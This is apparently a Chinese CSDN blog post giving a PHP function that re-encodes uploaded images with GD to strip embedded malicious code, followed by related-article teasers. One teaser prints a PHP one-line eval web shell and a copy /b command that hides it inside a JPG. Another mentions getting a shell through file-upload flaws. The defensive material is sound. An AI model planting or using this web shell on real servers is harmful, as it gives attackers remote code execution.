图片上传安全处理

最新推荐文章于 2021-10-21 20:18:23 发布
最新推荐文章于 2021-10-21 20:18:23 发布
阅读量742 收藏 1
点赞数
分类专栏: PHP 文章标签: 图片上传安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_20905/article/details/82442412
版权

对于用户上传的图片,必须要进行判断和处理,防止含有恶意代码的图片上传到服务器,造成安全隐患。

处理原理:对图片类型进行简单的检测,并以原图进行重新生成(重新生成会打乱其中的恶意代码)

处理方法(用此方法替换move_uploaded_file):

<?php
/*
 * 进行简单图片判断并上传(jpg,gif,png)
 *@param $file  $_FILES['']获取的值 ; $path 图片生成的物理路径(包含图片名称)
 *return 上传成功 true ;  图片类型异常 -1 ;上传失败 false;
 */
function image_save($file,$path){
  if ($file["type"] == "image/gif") {
    @$im = imagecreatefromgif($file['tmp_name']);
    if($im){
    	$sign = imagegif($im,$path);    
    }else{
    	return -1;
    }
  } elseif ($file["type"] == "image/png" || $file["type"] == "image/x-png") {
    @$im = imagecreatefrompng($file['tmp_name']);
    if($im){
    	$sign = imagepng($im,$path);    
    }else{
    	return -1;
    }
  } else {
    @$im = imagecreatefromjpeg($file['tmp_name']);
    if($im){
    	$sign = imagejpeg($im,$path,100);    
    }else{
    	return -1;
    }
  }
  return $sign;
}
 

iteye_20905
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
图片上传安全校验
fan
01-15 1万+
网上百度了一下验证图片上传的,发现大多都只是做了一个文件后缀名的判断 控制层用的框架SpringMVC 上传文件时,后台使用MultipartFile对象接收,前台action的enctype属性必须设置为multipart/form-data,提交方式必须为post提交 保存文件 后台使用MultipartFile对象保存文件时,需要确保保存文件的目录存在,否则会报错 方法内参数file为目...
图片上传
TLIKE的博客
08-23 227
开发工具与关键技术:VS C# 作者: 谭智聪 撰写时间:2020年8月21日 上传图片: 我们先在项目中创建一个文件夹来专门保存图片的,因为图片占内存比较大,一般不选择直接保存到数据库中,而是先将图片保存到项目的文件夹中,然后再将保存到文件中的图片路径保存到数据库中。 1、 给img标签绑定双击事件 设置样式宽高 <img src="" id="userPicture" ondblclick="showImageSelectDialog()" style="width: 150px; heigh
图片上传安全问题,根据ContentType (MIME) 判断其实不准确、不安全
weixin_30376323的博客
08-01 507
图片上传常用的类型判断方法有这么几种---截取扩展名、获取文件ContentType (MIME) 、读取byte来判断(这个什么叫法来着?)。前两种都有安全问题。容易被上传不安全的文件,如木马什么的。第1种截取文件扩展名来判断的方法很明显不安 全,第2种ContentType MIME可以伪造,所以用ContentType来判断其实也不安全。建议采用第3种。 C#演示: 1.截取扩展名来做判...
如何实现无刷新安全图片上传功能
u011277123的博客
01-18 3347
大龄菜鸟 2017-01-17 23:28 有时候我们想通过表单的方式收集用户的数据,例如,想收集用户在使用系统的过程中遇到的故障,我们可能需要提供一个表单让用户填写故障模块并附上截图。这时候,我们可能面对的是匿名的用户,即用户无需任何权限就能够提交表单,这就不得不考虑安全性的问题。例如,要检查用户提交的内容中是否包含恶意代码,防范SQL注入、XSS攻击等行为,另外,还要对用户的访问行为
图片上传安全检测
dianer5226的博客
08-27 363
//真正判断文件类型的关键函数 public static bool IsAllowedExtension(FileUpload hifile) { System.IO.FileStream fs = new System.IO.FileStream(hifile.PostedFile.FileName, System.IO.FileMode.Open, Sys...
Java对上传的图片进行格式校验以及安全性校验
热门推荐
太阳守护者Sunner的博客
12-18 1万+
文章目录前言判断上传的是否是图片通过后缀名进行判断通过文件头通过ImageIO判断图片文件的安全检查处理图片加水印 前言 在web开发中,肯定会有一些图片上传的功能,如果仅仅是通过页面端进行控制是远远不够的,完全可以直接调用后台的接口,将一些病毒文件上传到服务器,如果不进行校验,后果不堪设想! 判断上传的是否是图片 通过后缀名进行判断 这层校验应该说是最基本的校验了,看下文件的后缀名是否符合要求...
小程序图片安全审核方案与security.imgSecCheck不能校验超过1M图片的解决思路
u010952787的博客
10-15 1408
背景: 如上图,我的小程序涉及图片功能上线还没两天就被人搞了(上传了黄图然后被举报)。通过查看得知UGC平台类小程序,涉及到平台内用户发布,平台都要对用户发布内容设置违法违规内容过滤机制。当天连夜修改于是有了这篇文章。 本文用到的图片内容安全检测为小程序自带的同步API:security.imgSecCheck 优点:免费(白嫖的),小程序自带,无须额外申请,格式支持PNG、JPEG、JPG、GIF,单个 appId 调用上限为 2000 次/分钟,200,000 次/天,基本满足需要。 缺点:图片
PHP安全上传图片的方法
10-24
在PHP开发中,图片上传功能十分常见,但是如果没有经过充分的安全处理,就可能会引入各种安全风险。例如,不法用户可能上传恶意脚本文件,甚至执行远程代码执行(RCE)攻击。因此,了解和实现PHP中安全上传图片的...
asp拍照,上传压缩处理图片
10-18
通过以上技术手段,可以在ASP环境中构建一个功能完善的图片上传系统,既支持用户从本地选择图片,也能直接拍照上传,并对图片进行压缩处理,提高网站效率。同时,确保系统安全性和用户体验是设计过程中不可忽视的...
图像上传在线处理FLASH界面美观 JS
04-17
在IT行业中,图像上传与在线处理是网页应用中常见的功能,尤其在社交媒体、个人博客、电商网站等场景下,用户往往需要上传并编辑个人或商品的图片。本项目标题为"图像上传在线处理FLASH界面美观 JS",描述指出该系统...
Javascript验证上传图片大小[前台处理]
10-25
后台处理指的是服务器端在图片上传后进行大小的检查,而前台处理则是在图片上传到服务器之前,通过客户端的JavaScript代码对图片大小进行验证。 首先,前台处理有其显著的优势,主要表现在用户体验上。如果上传的...
web安全:JS纯前端实现图片或文件安全的上传和下载功能
weixin_42285167的博客
09-29 2702
背景 在做前端开发的过程中,做过很多的项目,都会遇到图片预览和展示。一般的图片都是用于页面美化,信息解释说明的作用。但是在接触某些业务场景时,例如用户注册需要上传用户个人身份证照片,办理业务需要上传证明材料图片,这类图片信息属于个人隐私,在网络传输过程中,可能会出现泄露,极大的安全风险。所以对于涉及个人隐私的图片在网络传输过程中有极大的安全要求。 解决方案 图片上传 上传图片过程中,传输数据指定为二进制类型,在request请求体,Header...
上传图片格式一句话木马
weixin_46017292的博客
04-25 1万+
一、 随便找一张jpg图片 二、 新建一个txt文档 三、 在文本文档中写入一句话木马 本次实验使用的木马为password <?php @eval($_POST['密码']);?> 四、 写入完成后将后缀名.txt改为.php 五、 合并文件 通过CMD进入储存jpg文件和php文件的目录 命令格式: cd C:\muma 使用copy命令合并文件 命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg 最后输出合并的木马文件muma.jpg 六、 打开靶场登陆DVW
服务器把上传文件后缀改了,检查上传图片是否合法的函数,木马改后缀名、图片加恶意代码均逃不过...
weixin_35157304的博客
08-10 667
检查上传图片是否合法的函数,木马改后缀名、图片加恶意代码均逃不过更新时间:2008年03月06日 21:42:10 作者:很多ASP程序检查上传图片是否合法往往只去检查文件的后缀,这样有一个很大的安全隐患,就是如果把ASP文件的后缀名改成.jpg或者.gif上传,或者图片里加入恶意代码再上传,那也会被程序认为是图片文件而照传不误。假如不怀好意的人上传个木马文件进去,虽然是后缀为jpg也许无法直...
上传文件的漏洞复现与修复
菼执的博客
10-21 6905
本文只说一些我遇到过的上传文件的漏洞。 工具:我装了kali,使用 burpsuite;Linux环境下的VirtualBox 要配一下,burpsuite的 proxy-->options 自己去哔哩哔哩找一下资料了解一下burpsuite的使用。 漏洞一:直接上传jsp、php、jspx、exe等这种在黑名单的文件。上传成功后,可以使用冰蝎等webshell工具去getshell ...
PHP判断图片是否为标准图片(防止篡改图片上传
M-zone
10-11 747
在项目安检时发现,某系项目中图片上传只是对后缀名进行了检查,导致含有某些代码的‘图片’也能上传到服务器,有重大隐患。写了一个方法,检验图片的正确性。(此方法无法完全验证,将图片源码中加了代码无法判断,不过将图片处理比如加水印以后,含有代码的图片在当作php执行时会失效)         如果需要对图片进行安全处理,经看这里---http://alfred-long.iteye.com/blo...
简单学会 ajax上传图片详细讲解(更换用户头像)
caimingxian401的博客
04-06 1万+
1:点击头像,调用标签&lt;input type="file" name="file"  id="user"/&gt;2:平时我们正常ajax请求数据如下图      假设我们的接口请求地址是    http:XXXXXXXXX?action=update_avatar&amp;token=123      data里面是我们要拼接到接口请求地址的参数。左边是参数右边是对应的值3:而图片上传,你...
如何判断上传的图片是否是正真的图片 防止上传恶意的非图片文件
luoxun11的专栏
02-19 649
final String JPG = "ffd8ffe0";//魔幻数字 final char[] HEX = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'}; InputStream in = ClassLoader.getSystemClassLoader().getResourceAsStr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值